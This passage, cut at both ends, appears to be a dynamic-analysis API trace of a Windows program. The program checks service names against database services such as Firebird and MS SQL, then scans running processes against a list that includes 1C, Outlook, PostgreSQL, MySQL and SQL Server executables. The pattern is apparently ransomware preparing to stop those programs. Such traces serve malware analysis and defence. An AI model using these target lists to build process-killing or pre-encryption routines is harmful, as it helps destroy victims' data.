lpString2="AudioSrv") returned 1 [0055.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0055.788] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0055.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0055.788] lstrlenW (lpString="BFE") returned 3 [0055.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0055.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0055.788] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0055.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0055.788] lstrlenW (lpString="CryptSvc") returned 8 [0055.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0055.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0055.788] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0055.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0055.788] lstrlenW (lpString="CscService") returned 10 [0055.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0055.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0055.788] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0055.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0055.788] lstrlenW (lpString="DcomLaunch") returned 10 [0055.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.788] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0055.789] lstrlenW (lpString="Dhcp") returned 4 [0055.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0055.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0055.789] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0055.789] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0055.789] lstrlenW (lpString="Dnscache") returned 8 [0055.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0055.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0055.789] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0055.789] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0055.789] lstrlenW (lpString="DPS") returned 3 [0055.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0055.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0055.789] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0055.789] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0055.789] lstrlenW (lpString="eventlog") returned 8 [0055.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0055.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0055.789] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0055.789] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0055.789] lstrlenW (lpString="EventSystem") returned 11 [0055.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0055.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0055.789] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0055.789] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0055.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0055.789] lstrlenW (lpString="gpsvc") returned 5 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0055.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0055.790] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0055.790] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0055.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0055.790] lstrlenW (lpString="iphlpsvc") returned 8 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.790] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0055.790] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0055.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0055.790] lstrlenW (lpString="LanmanServer") returned 12 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0055.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0055.790] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0055.790] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0055.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0055.790] lstrlenW (lpString="LanmanWorkstation") returned 17 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.790] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0055.790] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0055.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0055.790] lstrlenW (lpString="lmhosts") returned 7 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0055.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0055.790] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0055.790] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0055.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0055.790] lstrlenW (lpString="MMCSS") returned 5 [0055.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0055.791] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0055.791] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0055.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0055.791] lstrlenW (lpString="MpsSvc") returned 6 [0055.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0055.791] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0055.791] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0055.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0055.791] lstrlenW (lpString="Netman") returned 6 [0055.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0055.791] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0055.791] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0055.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0055.791] lstrlenW (lpString="netprofm") returned 8 [0055.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0055.791] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0055.791] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0055.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0055.791] lstrlenW (lpString="NlaSvc") returned 6 [0055.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0055.791] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0055.791] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0055.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0055.791] lstrlenW (lpString="nsi") returned 3 [0055.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0055.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0055.792] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0055.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0055.792] lstrlenW (lpString="PcaSvc") returned 6 [0055.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0055.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0055.792] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0055.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0055.792] lstrlenW (lpString="PlugPlay") returned 8 [0055.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0055.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0055.792] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0055.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0055.792] lstrlenW (lpString="Power") returned 5 [0055.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0055.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0055.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0055.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0055.792] lstrlenW (lpString="ProfSvc") returned 7 [0055.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0055.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0055.792] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0055.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0055.792] lstrlenW (lpString="RpcEptMapper") returned 12 [0055.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.792] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0055.793] lstrlenW (lpString="RpcSs") returned 5 [0055.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0055.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0055.793] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0055.793] lstrlenW (lpString="SamSs") returned 5 [0055.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0055.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0055.793] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0055.793] lstrlenW (lpString="Schedule") returned 8 [0055.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0055.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0055.793] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0055.793] lstrlenW (lpString="SENS") returned 4 [0055.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0055.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0055.793] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0055.793] lstrlenW (lpString="ShellHWDetection") returned 16 [0055.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.793] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0055.793] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0055.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0055.794] lstrlenW (lpString="Spooler") returned 7 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0055.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0055.794] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0055.794] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0055.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0055.794] lstrlenW (lpString="swprv") returned 5 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0055.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0055.794] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0055.794] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0055.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0055.794] lstrlenW (lpString="SysMain") returned 7 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0055.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0055.794] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0055.794] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0055.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0055.794] lstrlenW (lpString="Themes") returned 6 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0055.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0055.794] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0055.794] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0055.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0055.794] lstrlenW (lpString="TrkWks") returned 6 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0055.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0055.794] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0055.794] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0055.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0055.794] lstrlenW (lpString="UxSms") returned 5 [0055.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0055.795] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0055.795] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0055.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0055.795] lstrlenW (lpString="VSS") returned 3 [0055.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0055.795] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0055.795] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0055.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0055.795] lstrlenW (lpString="WdiServiceHost") returned 14 [0055.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.795] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0055.795] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0055.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0055.795] lstrlenW (lpString="WdiSystemHost") returned 13 [0055.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.795] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0055.795] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0055.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0055.795] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0055.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.795] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0055.795] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0055.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0055.795] lstrlenW (lpString="Winmgmt") returned 7 [0055.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0055.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0055.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0055.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0055.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0055.796] lstrlenW (lpString="WPDBusEnum") returned 10 [0055.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0055.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0055.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0055.796] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0055.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0055.799] Process32FirstW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.799] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.800] lstrlenW (lpString="System") returned 6 [0055.800] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0055.800] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0055.800] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.801] lstrlenW (lpString="smss.exe") returned 8 [0055.801] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0055.801] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0055.801] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.802] lstrlenW (lpString="csrss.exe") returned 9 [0055.802] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0055.802] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0055.802] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0055.802] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0055.802] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0055.802] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0055.802] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0055.802] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.803] lstrlenW (lpString="wininit.exe") returned 11 [0055.803] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0055.803] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0055.803] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0055.803] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.804] lstrlenW (lpString="csrss.exe") returned 9 [0055.804] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.804] lstrlenW (lpString="winlogon.exe") returned 12 [0055.804] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.805] lstrlenW (lpString="services.exe") returned 12 [0055.805] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.806] lstrlenW (lpString="lsass.exe") returned 9 [0055.806] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0055.806] lstrlenW (lpString="lsm.exe") returned 7 [0055.807] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.807] lstrlenW (lpString="svchost.exe") returned 11 [0055.807] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.808] lstrlenW (lpString="svchost.exe") returned 11 [0055.808] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, 